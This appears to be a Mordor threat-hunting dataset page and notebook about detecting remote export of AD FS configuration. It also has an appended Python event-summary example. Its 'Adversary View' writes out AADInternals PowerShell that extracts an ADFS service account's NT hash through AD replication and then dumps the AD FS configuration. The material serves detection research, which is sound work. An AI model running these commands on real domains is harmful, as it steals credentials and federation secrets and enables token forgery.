Export ADFS Database Configuration Remotely

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/04/27

Modification Date

2021/04/27

Tactics

['TA0008']

Techniques

['T0000']

Tags

None

Dataset Description

This dataset represents a threat actor exporting the AD FS database configuration remotely over HTTP.

Notebooks

Notebooks created by the community leveraging the mordor datasets

| Author | Name | Link |
| --- | --- | --- |

Simulation Plan

| Environment | Tool Type | Module |
| --- | --- | --- |
| Lab VM | PowerShell Module | Export-AADIntADFSConfiguration |

Adversary View

# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = get-credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
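The Spark SQL cell above is the first thing to run against any mordor dataset: it tells you which hosts, channels and event IDs the capture actually contains before you write a detection. The following is an added example, not a cell from the original notebook and not OTRF code: it produces the same Hostname/Channel/EventID summary in plain Python, so the layout of a mordor export (a zip of JSON-lines files, one event per line, with the `Hostname`, `Channel` and `EventID` fields the query groups by) can be inspected without a Spark session. The sample records and the `parse_mordor_zip` helper are assumptions made for this example; the event IDs in the sample are constructed and are not claimed to be what this dataset holds.

```python
# Added example (not part of the original mordor notebook or the OTRF project).
# Summarise mordor-style JSON-lines events by Hostname, Channel and EventID,
# mirroring the notebook's Spark SQL GROUP BY / ORDER BY count DESC query.
import json
import zipfile
from collections import Counter

# Constructed sample in the JSON-lines layout mordor exports use (one event
# per line). Hostnames reuse the lab names from the page; event IDs are
# constructed for illustration only. One deliberately broken line is included
# to show that the parser skips it instead of aborting the whole summary.
SAMPLE_EVENTS = "\n".join([
    '{"Hostname":"DC01.blacksmith.local","Channel":"Security","EventID":4662}',
    '{"Hostname":"DC01.blacksmith.local","Channel":"Security","EventID":4662}',
    '{"Hostname":"ADFS01.blacksmith.local","Channel":"Security","EventID":4624}',
    '{"Hostname":"ADFS01.blacksmith.local","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":3}',
    '{"Hostname":"WORKSTATION5.blacksmith.local","Channel":"Microsoft-Windows-Sysmon/Operational","EventID":1}',
    'this line is not JSON and must be skipped',
])


def parse_events(text):
    """Parse JSON-lines text into a list of dicts, skipping blank or malformed lines."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            obj = json.loads(raw)
        except json.JSONDecodeError:
            continue  # a truncated or non-JSON line should not discard the capture
        if isinstance(obj, dict):
            events.append(obj)
    return events


def parse_mordor_zip(path):
    """Assumed helper: read every member of a mordor .zip as JSON lines and parse it."""
    events = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            data = zf.read(name).decode("utf-8", errors="replace")
            events.extend(parse_events(data))
    return events


def count_by_source(events):
    """Equivalent of the notebook's query:
    SELECT Hostname, Channel, EventID, Count(*) GROUP BY ... ORDER BY count DESC.
    Returns (hostname, channel, event_id, count) tuples, highest count first;
    ties are ordered by key so the output is deterministic."""
    counter = Counter(
        (e.get("Hostname"), e.get("Channel"), e.get("EventID")) for e in events
    )
    rows = [(host, chan, eid, n) for (host, chan, eid), n in counter.items()]
    rows.sort(key=lambda r: (-r[3], str(r[0]), str(r[1]), str(r[2])))
    return rows


def show(rows):
    """Print the summary in the same column order as the Spark output."""
    print(f"{'count':>5}  {'Hostname':<32} {'Channel':<40} EventID")
    for host, chan, eid, n in rows:
        print(f"{n:>5}  {host:<32} {chan:<40} {eid}")


if __name__ == "__main__":
    show(count_by_source(parse_events(SAMPLE_EVENTS)))
```

To run it against the real dataset, download the zip referenced in the `mordor_file` cell and pass its local path to `parse_mordor_zip`; the summary it prints should match the `df.show()` table from the Spark cell, which is a quick sanity check that the file downloaded and parsed completely.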